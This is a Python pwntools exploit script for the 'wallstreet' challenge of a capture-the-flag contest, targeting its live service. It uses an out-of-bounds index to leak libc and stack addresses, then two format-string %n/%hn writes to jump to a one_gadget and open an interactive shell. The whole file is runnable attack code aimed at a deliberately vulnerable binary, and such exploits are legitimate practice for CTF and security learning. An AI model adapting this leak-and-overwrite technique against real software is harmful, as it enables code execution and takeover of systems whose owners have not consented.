#!/usr/bin/env python3
from pwn import *
# Target binary plus the libc/loader pair shipped with the challenge.
exe, libc, ld = (
    ELF("./wallstreet"),
    ELF("./libc-2.32.so"),
    ELF("./ld-2.32.so"),
)
# Let pwntools derive arch/bits/endianness from the target binary.
context.binary = exe
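def conn():
    """Spawn the target locally under the bundled loader and libc.

    The binary is launched through ``ld-2.32.so`` (loaded as ``ld`` above but
    previously unused) so the dynamic loader matches the LD_PRELOAD'ed
    ``libc-2.32.so``; preloading a foreign libc under the host's own ld.so is
    a common source of spurious crashes that look like exploit failures.

    Returns the pwntools process tube.
    """
    return process([ld.path, exe.path], env={"LD_PRELOAD": libc.path})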
# Toggle: non-zero talks to the live CTF service, zero spawns a local copy.
remotely = 1
r = remote("pwn.2021.chall.actf.co", 21800) if remotely else conn()
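def init_leak(leak):
    """Use menu option 1 to read one 8-byte value from the target and return it.

    ``leak`` is sent verbatim as the "stonk" index; callers pass negative
    values (-16, -32), so this relies on the binary not bounds-checking the
    index, i.e. an out-of-bounds read — TODO confirm against the binary.

    Returns the value as an int: the line read back is stripped, zero-padded
    to 8 bytes and unpacked little-endian.  ``u64`` raises if the line holds
    more than 8 bytes.
    """
    # NOTE(review): bare recv() returns whatever happens to be buffered, so
    # these two reads are timing-dependent; the remote-only resync below
    # exists to cope with that.  Anchoring on the real prompt text would be
    # more robust, but that text is not visible from this file.
    r.recv()
    # Tubes take bytes on Python 3; passing str only works via pwntools'
    # best-effort encoding guess, so be explicit.
    r.sendline(b"1")
    r.recv()
    r.sendline(str(leak).encode())
    if remotely:
        # Re-synchronise on the prompt, then skip the line that follows it.
        r.recvuntil(b"What stonk do you want to see?")
        r.recvline()
    raw = r.recvline().strip()
    return u64(raw.ljust(8, p8(0)))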
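def main():
    """Two-stage format-string exploit against the "wallstreet" service.

    Stage 1 leaks ``_IO_2_1_stdout_`` to compute the libc base, then sends a
    format string performing a ``%n`` write and trailing a pointer to
    ``main`` (presumably to get a second pass through ``main`` — how the
    pointer is reached is not visible here, TODO confirm).  Stage 2 leaks a
    stack pointer, performs a ``%hn`` partial overwrite that points 0x38
    below it, fills the buffer with a libc address, and hands the tube over.

    Raises RuntimeError when a leak is obviously unusable, instead of firing
    a write at a garbage address.
    """
    # NOTE(review): bare offset into libc-2.32; looks like a one_gadget
    # address but that is not shown here — named so it is easy to re-derive.
    ONE_GADGET_OFF = 0xdf54c

    # --- stage 1: libc leak + %n write --------------------------------------
    stdout_leak = init_leak(-16)
    log.warn("Leak @ 0x%x", stdout_leak)
    libc.address = stdout_leak - libc.sym['_IO_2_1_stdout_']
    log.warn("Libc base @ 0x%x", libc.address)
    # A libc base is page-aligned; anything else means the leak was not the
    # stdout struct and every later address would be wrong.
    if libc.address & 0xfff:
        raise RuntimeError("libc base 0x%x is not page-aligned; bad leak" % libc.address)

    r.recv()
    # %100$n stores the number of bytes printed (count) through the pointer
    # printf finds in argument slot 100; the sum is kept as written because
    # it documents how the value was derived.
    count = 0x2 + 0x2d6 + 0x100
    payload = f"%{count}c%100$n".encode()
    payload = payload.ljust(0x110, p8(0)) + p64(exe.sym['main'])
    r.sendline(payload)

    # --- stage 2: stack leak + %hn overwrite ---------------------------------
    stack_leak = init_leak(-32)
    log.warn("Stack leak @ 0x%x", stack_leak)
    one_gadget = libc.address + ONE_GADGET_OFF

    # %hn writes the number of bytes printed so far, which here is exactly the
    # %c field width (the preceding %82$n prints nothing).  printf cannot
    # print a negative or zero width — "%-5c" is left-justification and "%0c"
    # still emits one char — so the low 16 bits of the leak must exceed 0x38;
    # the stack's in-page offset is randomised, so this can legitimately fail.
    width = (stack_leak & 0xffff) - 0x38
    if width <= 0:
        raise RuntimeError("stack leak low bits 0x%x too small for %%hn write; rerun"
                           % (stack_leak & 0xffff))
    fmt = f"%{0x52}$n%{width}c%{0x30}$hn"
    payload = fmt.ljust(0x20, "\x00").encode()
    # Spray the target address across the rest of the buffer.
    payload += p64(one_gadget) * (0x110 // 8)
    r.send(payload)
    r.interactive()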
# Entry point: run the exploit only when executed as a script, not on import.
if __name__ == "__main__":
    main()